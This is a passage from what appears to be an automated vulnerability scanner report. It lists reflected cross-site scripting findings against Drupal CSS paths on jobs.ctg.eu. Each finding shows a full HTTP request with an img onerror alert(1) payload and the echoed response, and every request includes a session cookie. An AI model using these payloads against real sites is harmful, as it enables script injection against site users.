GET /sites/all/modulesfa6eb"><img%20src%3da%20onerror%3dalert(1)>14bd3227d0a/filefield/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesfa6eb"><img src=a onerror=alert(1)>14bd3227d0a-filefield-filefield.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.67. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c98c"><img%20src%3da%20onerror%3dalert(1)>069115183be was submitted in the REST URL parameter 4. This input was echoed as 3c98c"><img src=a onerror=alert(1)>069115183be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/filefield3c98c"><img%20src%3da%20onerror%3dalert(1)>069115183be/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-filefield3c98c"><img src=a onerror=alert(1)>069115183be-filefield.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.68. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fd8"><img%20src%3da%20onerror%3dalert(1)>1fcab1747c6 was submitted in the REST URL parameter 5. This input was echoed as c1fd8"><img src=a onerror=alert(1)>1fcab1747c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/filefield/filefield.cssc1fd8"><img%20src%3da%20onerror%3dalert(1)>1fcab1747c6?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-filefield-filefield.cssc1fd8"><img src=a onerror=alert(1)>1fcab1747c6 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.69. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73224"><img%20src%3da%20onerror%3dalert(1)>9589d103583 was submitted in the REST URL parameter 1. This input was echoed as 73224"><img src=a onerror=alert(1)>9589d103583 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites73224"><img%20src%3da%20onerror%3dalert(1)>9589d103583/all/modules/logintoboggan/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites73224"><img src=a onerror=alert(1)>9589d103583-all-modules-logintoboggan-logintoboggan.css not-front not-logged-in page-sites73224img-srca-onerroralert19589d103583 no-sidebars">
...[SNIP]...

3.70. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ad"><img%20src%3da%20onerror%3dalert(1)>2a3d032736e was submitted in the REST URL parameter 2. This input was echoed as 544ad"><img src=a onerror=alert(1)>2a3d032736e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all544ad"><img%20src%3da%20onerror%3dalert(1)>2a3d032736e/modules/logintoboggan/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all544ad"><img src=a onerror=alert(1)>2a3d032736e-modules-logintoboggan-logintoboggan.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.71. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790cb"><img%20src%3da%20onerror%3dalert(1)>671c6b10ccd was submitted in the REST URL parameter 3. This input was echoed as 790cb"><img src=a onerror=alert(1)>671c6b10ccd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules790cb"><img%20src%3da%20onerror%3dalert(1)>671c6b10ccd/logintoboggan/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules790cb"><img src=a onerror=alert(1)>671c6b10ccd-logintoboggan-logintoboggan.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.72. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12225"><img%20src%3da%20onerror%3dalert(1)>e7c4abc7d00 was submitted in the REST URL parameter 4. This input was echoed as 12225"><img src=a onerror=alert(1)>e7c4abc7d00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/logintoboggan12225"><img%20src%3da%20onerror%3dalert(1)>e7c4abc7d00/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-logintoboggan12225"><img src=a onerror=alert(1)>e7c4abc7d00-logintoboggan.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.73. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302e5"><img%20src%3da%20onerror%3dalert(1)>7ed5455b6be was submitted in the REST URL parameter 5. This input was echoed as 302e5"><img src=a onerror=alert(1)>7ed5455b6be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/logintoboggan/logintoboggan.css302e5"><img%20src%3da%20onerror%3dalert(1)>7ed5455b6be?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-logintoboggan-logintoboggan.css302e5"><img src=a onerror=alert(1)>7ed5455b6be not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.74. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f3d1"><img%20src%3da%20onerror%3dalert(1)>eea6370678e was submitted in the REST URL parameter 1. This input was echoed as 9f3d1"><img src=a onerror=alert(1)>eea6370678e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites9f3d1"><img%20src%3da%20onerror%3dalert(1)>eea6370678e/all/modules/views/css/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:31:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:31:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites9f3d1"><img src=a onerror=alert(1)>eea6370678e-all-modules-views-css-views.css not-front not-logged-in page-sites9f3d1img-srca-onerroralert1eea6370678e no-sidebars">
...[SNIP]...

3.75. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e296a"><img%20src%3da%20onerror%3dalert(1)>55f421ac453 was submitted in the REST URL parameter 2. This input was echoed as e296a"><img src=a onerror=alert(1)>55f421ac453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/alle296a"><img%20src%3da%20onerror%3dalert(1)>55f421ac453/modules/views/css/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-alle296a"><img src=a onerror=alert(1)>55f421ac453-modules-views-css-views.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.76. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f68"><img%20src%3da%20onerror%3dalert(1)>5a9f31570fe was submitted in the REST URL parameter 3. This input was echoed as d4f68"><img src=a onerror=alert(1)>5a9f31570fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesd4f68"><img%20src%3da%20onerror%3dalert(1)>5a9f31570fe/views/css/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesd4f68"><img src=a onerror=alert(1)>5a9f31570fe-views-css-views.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.77. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38029"><img%20src%3da%20onerror%3dalert(1)>d2997aa32cd was submitted in the REST URL parameter 4. This input was echoed as 38029"><img src=a onerror=alert(1)>d2997aa32cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views38029"><img%20src%3da%20onerror%3dalert(1)>d2997aa32cd/css/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views38029"><img src=a onerror=alert(1)>d2997aa32cd-css-views.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.78. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a641b"><img%20src%3da%20onerror%3dalert(1)>bebe5c861b9 was submitted in the REST URL parameter 5. This input was echoed as a641b"><img src=a onerror=alert(1)>bebe5c861b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/cssa641b"><img%20src%3da%20onerror%3dalert(1)>bebe5c861b9/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-cssa641b"><img src=a onerror=alert(1)>bebe5c861b9-views.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.79. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce"><img%20src%3da%20onerror%3dalert(1)>e2f23c29595 was submitted in the REST URL parameter 6. This input was echoed as 217ce"><img src=a onerror=alert(1)>e2f23c29595 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/css/views.css217ce"><img%20src%3da%20onerror%3dalert(1)>e2f23c29595?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
